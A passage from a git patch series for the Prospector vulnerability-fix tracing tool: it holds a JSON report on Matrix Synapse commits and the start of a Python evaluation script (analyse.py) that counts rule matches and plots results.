"v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "0378581c1335e7e7e9dc0b482b5bf6efb63859be", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608071660, + "hunks": 8, + "message": "remove 'response' result from `_get_shared_rooms`", + "diff": [ + "diff --git a/tests/rest/client/v2_alpha/test_shared_rooms.py b/tests/rest/client/v2_alpha/test_shared_rooms.py", + "index 562a9c1ba..05c5ee5a7 100644", + "--- a/tests/rest/client/v2_alpha/test_shared_rooms.py", + "+++ b/tests/rest/client/v2_alpha/test_shared_rooms.py", + "@@ -19,2 +19,3 @@ from synapse.rest.client.v2_alpha import shared_rooms", + " from tests import unittest", + "+from tests.server import FakeChannel", + "@@ -42,4 +43,4 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + "- def _get_shared_rooms(self, token, other_user):", + "- request, channel = self.make_request(", + "+ def _get_shared_rooms(self, token, other_user) -> FakeChannel:", + "+ _, channel = self.make_request(", + " \"GET\",", + "@@ -49,3 +50,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + " )", + "- return request, channel", + "+ return channel", + "@@ -65,3 +66,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + "- request, channel = self._get_shared_rooms(u1_token, u2)", + "+ channel = self._get_shared_rooms(u1_token, u2)", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -84,3 +85,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + "- request, channel = self._get_shared_rooms(u1_token, u2)", + "+ channel = self._get_shared_rooms(u1_token, u2)", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -106,3 +107,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + "- request, channel = self._get_shared_rooms(u1_token, u2)", + "+ channel = self._get_shared_rooms(u1_token, u2)", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -127,3 +128,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + " # Assert user directory is not empty", + "- request, channel = self._get_shared_rooms(u1_token, u2)", + "+ channel = self._get_shared_rooms(u1_token, u2)", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -134,3 +135,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", + "- request, channel = self._get_shared_rooms(u2_token, u1)", + "+ channel = self._get_shared_rooms(u2_token, u1)", + " self.assertEquals(200, channel.code, channel.result)" + ], + "changed_files": [ + "tests/rest/client/v2_alpha/test_shared_rooms.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "2d7ca53ab54dd03dce0d64cf41b0b74de16f3215", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607530307, + "hunks": 0, + "message": "Merge branch 'rav/fix_multiarch_builds' into v1.23.1-multiarch", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [] + }, + { + "commit_id": "863359a04fe36cfa63aa92392acb7510d76f854d", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608049573, + "hunks": 0, + "message": "Merge remote-tracking branch 'origin/develop' into matrix-org-hotfixes", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.35.0rc3" + ], + "matched_rules": [] + }, + { + "commit_id": "33a349df91a459435e33c5676bb40c8690492f65", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608038594, + "hunks": 2, + "message": "Merge branch 'develop' into matrix-org-hotfixes", + "diff": [ + "diff --cc synapse/push/httppusher.py", + "index d011e0ace,5408aa129..995e86e31", + "--- a/synapse/push/httppusher.py", + "+++ b/synapse/push/httppusher.py", + "@@@ -101,8 -95,16 +95,21 @@@ class HttpPusher(Pusher)", + " raise PusherConfigException(\"'url' required in data for HTTP pusher\")", + "- self.url = self.data[\"url\"]", + "- self.url = self.url.replace(", + "+ ", + "+ url = self.data[\"url\"]", + "+ if not isinstance(url, str):", + "+ raise PusherConfigException(\"'url' must be a string\")", + "+ url_parts = urllib.parse.urlparse(url)", + "+ # Note that the specification also says the scheme must be HTTPS, but", + "+ # it isn't up to the homeserver to verify that.", + "+ if url_parts.path != \"/_matrix/push/v1/notify\":", + "+ raise PusherConfigException(", + "+ \"'url' must have a path of '/_matrix/push/v1/notify'\"", + "+ )", + "+ ", + "++ url = url.replace(", + " + \"https://matrix.org/_matrix/push/v1/notify\",", + " + \"http://10.103.0.7/_matrix/push/v1/notify\",", + " + )", + "- self.http_client = hs.get_proxied_http_client()", + "++", + "+ self.url = url", + "+ self.http_client = hs.get_proxied_blacklisted_http_client()", + " self.data_minus_url = {}" + ], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.35.0rc3" + ], + "matched_rules": [] + }, + { + "commit_id": "4b08c387078aacefb7a06da2076eefc6673c4d55", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607530079, + "hunks": 3, + "message": "Tweak CircleCI config to trigger rebuild of v1.24.0", + "diff": [ + "diff --git a/.circleci/config.yml b/.circleci/config.yml", + "index 088da5573..a0dad04d0 100644", + "--- a/.circleci/config.yml", + "+++ b/.circleci/config.yml", + "@@ -10,21 +10,5 @@ jobs:", + " - docker_build:", + "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", + "- platforms: linux/amd64", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", + "+ tag: -t matrixdotorg/synapse:v1.24.0", + " platforms: linux/amd64,linux/arm/v7,linux/arm64", + "- dockerhubuploadlatest:", + "- docker:", + "- - image: docker:git", + "- steps:", + "- - checkout", + "- - docker_prepare", + "- - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:latest", + "- platforms: linux/amd64", + "- - docker_build:", + "- tag: -t matrixdotorg/synapse:latest", + "- platforms: linux/amd64,linux/arm/v7,linux/arm64", + "@@ -33,12 +17,3 @@ workflows:", + " jobs:", + "- - dockerhubuploadrelease:", + "- filters:", + "- tags:", + "- only: /v[0-9].[0-9]+.[0-9]+.*/", + "- branches:", + "- ignore: /.*/", + "- - dockerhubuploadlatest:", + "- filters:", + "- branches:", + "- only: master", + "+ - dockerhubuploadrelease" + ], + "changed_files": [ + ".circleci/config.yml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [] + }, + { + "commit_id": "7932d4e9f7e140ef05a3099e18120101019ec3e1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608206654, + "hunks": 2, + "message": "Don't MAU limit AS ghost users", + "diff": [ + "diff --git a/synapse/api/auth_blocking.py b/synapse/api/auth_blocking.py", + "index 9c227218e..d8088f524 100644", + "--- a/synapse/api/auth_blocking.py", + "+++ b/synapse/api/auth_blocking.py", + "@@ -38,2 +38,3 @@ class AuthBlocking:", + " self._server_name = hs.hostname", + "+ self._track_appservice_user_ips = hs.config.appservice.track_appservice_user_ips", + "@@ -78,2 +79,8 @@ class AuthBlocking:", + " return", + "+ elif requester.app_service and not self._track_appservice_user_ips:", + "+ # If we're authenticated as an appservice then we only block", + "+ # auth if `track_appservice_user_ips` is set, as that option", + "+ # implicitly means that application services are part of MAU", + "+ # limits.", + "+ return" + ], + "changed_files": [ + "synapse/api/auth_blocking.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + } + ], + "processing_statistics": { + "LLM": { + "llm": { + "llm_service": { + "LLMService": { + "get_repository_url": { + "execution time": [ + 4.501857290044427 + ] + }, + "classify_commit": { + "execution time": [ + 1.8918308150023222, + 2.55834315251559, + 1.3472756873816252, + 1.5047113839536905, + 1.178794912993908, + 2.4042293401435018, + 2.262474901974201, + 1.3570511750876904, + 1.1510695340111852, + 1.2340552862733603 + ] + } + } + } + }, + "Get Repository URL": { + "# refs in request": [ + 244 + ] + } + }, + "core": { + "git": { + "git": { + "Git": { + "create_commits": { + "execution time": [ + 0.14438306167721748 + ] + } + } + } + }, + "commit preprocessing": { + "commit preprocessing": { + "preprocessed commits": [ + 91 + ] + }, + "execution time": [ + 93.05194529611617 + ] + }, + "save commits to backend": { + "execution time": [ + 0.02628356497734785 + ] + }, + "candidates analysis": { + "execution time": [ + 16.966724146157503 + ] + }, + "execution time": [ + 145.1848293952644 + ] + }, + "rules": { + "active": [ + 17 + ], + "matches": [ + 178 + ] + } + } +} From 67fca69fe3afdd27b21a6133eeb1aa7369262d83 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 14:48:41 +0000 Subject: [PATCH 029/130] breaks up matteo's script into smaller files --- prospector/evaluation/analyse.py | 619 +++++++++++++++++ prospector/evaluation/dispatch_jobs.py | 348 ++++++++++ prospector/evaluation/run_multiple.py | 928 +------------------------ prospector/evaluation/utils.py | 0 4 files changed, 969 insertions(+), 926 deletions(-) create mode 100644 prospector/evaluation/analyse.py create mode 100644 prospector/evaluation/dispatch_jobs.py create mode 100644 prospector/evaluation/utils.py diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py new file mode 100644 index 000000000..afff92596 --- /dev/null +++ b/prospector/evaluation/analyse.py @@ -0,0 +1,619 @@ +import csv +import json +import re +from collections import defaultdict +from typing import Dict, List +from urllib.parse import urlparse + +import seaborn as sns +from matplotlib import pyplot as plt + +from datamodel.advisory import build_advisory_record +from evaluation.dispatch_jobs import build_table_row, load_dataset + + +def analyze_results_rules(dataset_path: str): + print(dataset_path) + dataset_path = "empirical_study/datasets/" + dataset_path + ".csv" + dataset = load_dataset(dataset_path) + rules = {} + table = {} + count = 0 + for itm in dataset: + try: + r, i, v, id = check_report_get_rules(dataset_path[:-4], itm[0], itm[4]) + if r is not None: + count += 1 + table[itm[0]] = [id, v, r, itm] + for rule in r: + if rule not in rules: + rules[rule] = 1 + rules[rule] += 1 + except FileNotFoundError: + continue + + ordered = dict(sorted(rules.items())) + for k, v in ordered.items(): + print(f"{k} & {v} & {(v / count)*100:.2f}\\% \\\\") + + plt.rcParams["figure.autolayout"] = True + sns.set_style("whitegrid") + colors = [ + ( + "#0063B2FF" + if id + in ( + "COMMIT_IN_REFERENCE", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", + "CVE_ID_IN_MESSAGE", + ) + else "#9CC3D5FF" + ) + for id in ordered.keys() + ] + ss = sns.barplot( + y=list(ordered.keys()), + x=list(ordered.values()), + palette=colors, + ) + ss.set_xscale("log", base=2) + ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + + # ss.set_xticks(range(0, 800, 100)) + ss.tick_params(axis="y", labelsize=8) + plt.show() + print(count) + for k, v in table.items(): + if "CVE_ID_IN_LINKED_ISSUE" in v[2]: + print(f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}") + # print(f"{k}: {v[3]}/commit/{v[0]}") + + +def analyze_prospector(filename: str): # noqa: C901 + # delete_missing_git(dataset_path) + # return [] + filename = "empirical_study/datasets/" + filename + ".csv" + dataset = load_dataset(filename) + # res_ts = temp_load_reservation_dates(dataset_path[:-4] + "_timestamps.csv") + + missing = [] + skipped = 0 + # timestamps = { + # "COMMIT_IN_REFERENCE": list(), + # "CVE_ID_IN_MESSAGE": list(), + # "CVE_ID_IN_LINKED_ISSUE": list(), + # "CROSS_REFERENCE": list(), + # "medium_confidence": list(), + # "low_confidence": list(), + # } + yearly_timestamps = {} + results = { + "COMMIT_IN_REFERENCE": set(), + "CVE_ID_IN_MESSAGE": set(), + "CVE_ID_IN_LINKED_ISSUE": set(), + "CROSS_REFERENCE": set(), + "medium_confidence": set(), + "low_confidence": set(), + "not_found": set(), + "not_reported": set(), + "false_positive": set(), + "real_false_positive": set(), + } + rulescount = defaultdict(lambda: 0) + # references = list() + + for itm in dataset: + try: + ( + is_fix, + has_certainty, + commit_id, + exists, + position, + ranks, + rules, + ) = check_report( + filename[:-4], itm[0], itm[4] + ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + except FileNotFoundError: + continue + + # year = itm[0].split("-")[1] + # if is_fix and timestamp is not None: + # res_timestamp = get_reservation_date(itm[0]) + # if res_timestamp is not None: + # ts = timestamp - res_timestamp + # # if int(ts / 86400) > -900: + # year = itm[0].split("-")[1] + # if year not in timestamps: + # timestamps[year] = [] + # timestamps[year].append(int(ts / 86400)) + # # ts_analsis.append(int(ts / 86400)) + # else: + # print(f"Missing reservation date for {itm[0]}") + # time.sleep(0.05) + # if timestamp: + + # # adv_ts = res_ts.get(itm[0]) + # timestamp = adv_ts - timestamp + # yearly_timestamps.setdefault(year, list()) + # yearly_timestamps[year].append(int(timestamp / 86400)) + # timestamp = abs(timestamp) + + # if is_fix and position < 10: + # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) + # print(itm[0], rules) + # else: + # continue + # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) + # for rule in rules: + # rulescount[rule] += 1 + # continue + if is_fix and has_certainty: # and 0 <= position < 10: + print( + itm[0], + "&", + " & ".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + results[has_certainty].add(itm[0]) + # if "COMMIT_IN_REFERENCE" in has_certainty and all( + # rule != "COMMIT_IN_REFERENCE" + # for rule in has_certainty + # if rule != "COMMIT_IN_REFERENCE" + # ): + # with open("only_commit_in_reference2.csv", "a", newline="") as file: + # writer = csv.writer(file) + # writer.writerow( + # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + # ) + # elif all(rule != "COMMIT_IN_REFERENCE" for rule in has_certainty): + # with open("only_other_strong_rules.csv", "a", newline="") as file: + # writer = csv.writer(file) + # writer.writerow( + # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + # ) + for rule in rules: + rulescount[rule] += 1 + # print(f"{filename[:-4]}/{itm[0]}.json") + # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + # print(f"{filename[:-4]}/{itm[0]}.json") + # timestamps["false_positive"].append(timestamp) + # elif is_fix and has_certainty and position > 0: + # results["real_false_positive"].add(itm[0]) + # if int(timestamp / 86400) < 731: + # timestamps[has_certainty].append(int(timestamp / 86400)) + elif is_fix and not has_certainty and position == 0: + print( + itm[0], + "&", + " & ".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + results["medium_confidence"].add(itm[0]) + for rule in rules: + rulescount[rule] += 1 + # print(itm[0] + " - " + str(position + 1)) + + # if int(timestamp / 86400) < 731: + # timestamps["medium_confidence"].append(int(timestamp / 86400)) + elif is_fix and not has_certainty and 0 < position < 10: + results["low_confidence"].add(itm[0]) + print( + itm[0], + "&", + " & 